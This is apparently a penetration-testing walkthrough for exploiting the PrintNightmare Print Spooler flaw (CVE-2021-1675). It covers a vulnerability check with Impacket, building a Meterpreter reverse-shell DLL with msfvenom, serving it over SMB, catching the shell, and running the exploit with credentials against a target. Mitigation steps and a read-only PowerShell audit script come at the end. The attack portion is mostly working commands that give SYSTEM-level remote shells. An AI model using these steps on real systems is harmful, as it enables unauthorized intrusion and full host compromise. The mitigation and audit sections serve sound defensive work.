This is a remote code execution vulnerability disclosed on June 1st 2021. The exploit takes advantage of the Print Spooler service running as SYSTEM and allows remote code execution as the SYSTEM user. The exploit does require valid user credentials, which makes this an excellent Windows privilege escalation tool to add to your arsenal.
For Linux:
https://github.com/cube0x0/CVE-2021-1675
PowerShell:
https://github.com/calebstewart/CVE-2021-1675
Microsoft has released a patch to mitigate these attacks, but if the registry values below are present on a machine, the machine will still be vulnerable:
REG QUERY "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
RestrictDriverInstallationToAdministrators REG_DWORD 0x0
NoWarningNoElevationOnInstall REG_DWORD 0x1
Impacket also provides a tool for remote testing. If this tool returns either of the protocol results below, the host exposes the Print Spooler RPC interfaces and could be vulnerable.
rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
The exploit requires the latest version of Impacket.
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
Before executing the payload against the remote target we need three things:
- A payload to run as SYSTEM once the exploit has completed. The easiest option is to create a reverse shell with msfvenom.
- An SMB share on our machine hosting the payload.
- A handler to catch the Meterpreter shell (if we used a Meterpreter payload).
Create Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.240 LPORT=4444 -f dll > shelly.dll
Setup SMB Share
smbserver.py share `pwd`
Note: `pwd` sets our current working directory as the shared directory. "share" is the name of the share and can be anything.
Start Multi Handler in msfconsole (LHOST and LPORT must match the values used when the payload was generated)
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.240
set LPORT 4444
run
Execute the payload
python3 CVE-2021-1675.py pwnme.local/smarsh:Password1@192.168.1.50 '\\192.168.1.240\share\shelly.dll'
Mitigation
Disable the Spooler service (stop it, then set its startup type to Disabled so it does not return after a reboot)
Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
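The registry check above and the Spooler mitigation can be combined into a single host audit. The script below is an added example, not part of the original post or either exploit repository; it assumes an elevated local PowerShell session and only reports state (it does not check whether the Microsoft patch itself is installed).

```powershell
# Added example: audit a host for the PrintNightmare risk conditions described above.
# Assumes an elevated local session; read-only, no changes are made to the host.
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'

# Is the Print Spooler service present and running? Disabled/stopped is the mitigated state.
$spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
$spoolerRunning = [bool]($spooler -and $spooler.Status -eq 'Running')

# Read the two Point and Print values; $null means the value is not configured.
$props = if (Test-Path -Path $key) { Get-ItemProperty -Path $key } else { $null }
$restrict = $props.RestrictDriverInstallationToAdministrators
$noWarn   = $props.NoWarningNoElevationOnInstall

# The weak combination from the post: non-admins may install drivers (0) and no warning/elevation (1).
$weakPointAndPrint = ($restrict -eq 0) -or ($noWarn -eq 1)

$findings = @()
if ($spoolerRunning)  { $findings += 'Spooler service is running' }
if ($restrict -eq 0)  { $findings += 'RestrictDriverInstallationToAdministrators = 0' }
if ($noWarn -eq 1)    { $findings += 'NoWarningNoElevationOnInstall = 1' }
if (-not $findings)   { $findings += 'No risk conditions found' }

# One object per host so the output can be piped to Export-Csv or a SIEM forwarder.
[pscustomobject]@{
    ComputerName                                = $env:COMPUTERNAME
    SpoolerRunning                              = $spoolerRunning
    RestrictDriverInstallationToAdministrators  = $restrict
    NoWarningNoElevationOnInstall               = $noWarn
    WeakPointAndPrint                           = $weakPointAndPrint
    AtRisk                                      = ($spoolerRunning -and $weakPointAndPrint)
    Findings                                    = ($findings -join '; ')
}
```

AtRisk is true only when the Spooler is running and at least one weak Point and Print value is set; a host with the Spooler disabled reports false regardless of the registry values.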